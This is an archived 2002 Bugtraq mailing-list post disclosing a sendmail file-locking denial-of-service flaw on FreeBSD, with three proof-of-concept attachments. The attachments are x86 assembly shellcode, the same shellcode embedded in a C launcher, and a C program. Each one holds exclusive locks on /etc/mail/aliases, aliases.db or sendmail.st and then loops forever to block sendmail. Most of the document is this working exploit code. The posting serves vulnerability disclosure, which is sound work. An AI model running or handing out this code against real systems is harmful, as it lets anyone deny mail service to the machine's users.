8495352 2002-05-24 01:48 -0400 /14 rader/ KF <dotslash@snosoft.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-24 20:52 av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22389>
Ärende: Sendmail file locking - PoC
------------------------------------------------------------
From: KF <dotslash@snosoft.com>
To: bugtraq <bugtraq@securityfocus.org>, vuln-dev@security-focus.com
Message-ID: <3CEDD441.3070504@snosoft.com>
A problem has been identified in sendmail that can result in a denial
of service attack. Attached is proof of concept code for this issue.
http://www.sendmail.org/LockingAdvisory.txt
have a safe Memorial Day folks.
-KF
(8495352) /KF <dotslash@snosoft.com>/-----(Ombruten)
Bilaga (text/plain) i text 8495354
Bilaga (text/plain) i text 8495355
Bilaga (text/plain) i text 8495356
8495354 2002-05-24 01:48 -0400 /40 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-DoS.S"
Importerad: 2002-05-24 20:52 av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22390>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-DoS.S) till: Sendmail file locking - PoC
------------------------------------------------------------
;
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com : zillion@snosoft.com
; http://www.sendmail.org/LockingAdvisory.txt
;
BITS 32
jmp short callit
doit:
pop esi
xor eax,eax
mov [esi + 20],al
push eax
push esi
mov al,5
push eax
int 0x80
push byte 0x2
push eax
mov al,131
push eax
int 0x80
; Where going to stay forever ;-)
sub cl,0x3
l00p:
js l00p
callit:
call doit
db '/etc/mail/aliases.db'
(8495354) /KF <dotslash@snosoft.com>/---------------
8495355 2002-05-24 01:48 -0400 /24 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-DoS.c"
Importerad: 2002-05-24 20:52 av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22391>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-DoS.c) till: Sendmail file locking - PoC
------------------------------------------------------------
/*
FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org &&
http://www.snosoft.com)
More info: http://www.sendmail.org/LockingAdvisory.txt
*/
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
"\x69\x61\x73\x65\x73\x2e\x64\x62";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
(8495355) /KF <dotslash@snosoft.com>/-----(Ombruten)
8495356 2002-05-24 01:48 -0400 /42 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-filelock-dos.c"
Importerad: 2002-05-24 20:52 av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22392>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-filelock-dos.c) till: Sendmail file locking - PoC
------------------------------------------------------------
#include <fcntl.h>
#include <unistd.h>
/*
Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.
More info: http://www.sendmail.org/LockingAdvisory.txt
zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com
*/
int main() {
if(fork() == 0) {
char *lock1 = "/etc/mail/aliases";
char *lock2 = "/etc/mail/aliases.db";
char *lock3 = "/var/log/sendmail.st";
int fd;
fd = open(lock1,O_RDONLY);
flock(fd,0x02);
fd = open(lock2,O_RDONLY);
flock(fd,0x02);
fd = open(lock3,O_RDONLY);
flock(fd,0x02);
/* We are here to stay! */
for(;;) {}
}
}
(8495356) /KF <dotslash@snosoft.com>/---------------